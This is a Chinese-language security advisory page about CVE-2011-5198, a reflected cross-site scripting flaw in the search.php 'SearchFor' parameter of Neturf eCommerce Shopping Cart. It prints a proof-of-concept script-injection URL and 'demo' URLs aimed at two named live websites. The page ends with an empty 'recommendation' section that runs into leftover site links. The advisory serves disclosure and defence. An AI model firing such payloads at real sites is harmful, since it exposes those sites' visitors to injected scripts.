发布日期:2012-09-23
更新日期:2012-10-02受影响系统:
neturf eCommerce Shopping Cart
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2011-5198Neturf eCommerce Shopping Cart是一个网络购物车应用。Neturf eCommerce Shopping Cart没有正确过滤传递到search.php内"SearchFor"参数的输入,即返回给用户,可被利用在受影响站点的用户浏览器中执行任意HTML和脚本代码。<*来源:farbodmahini
链接:http://secunia.com/advisories/47354
http://packetstormsecurity.org/files/108231/neturf-xss.txt
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Exploit:
#
# http://target.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
#
#
# Demo:
#
# www.neturf.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
# www.darkhorseobservatory.org/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
#建议:要389目录服务器访问绕过漏洞Joomla JE Poll组件不明细节参数SQL注入漏洞相关资讯 Neturf eCommerce Shopping Cart 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
-
|
易网时代-编程资源站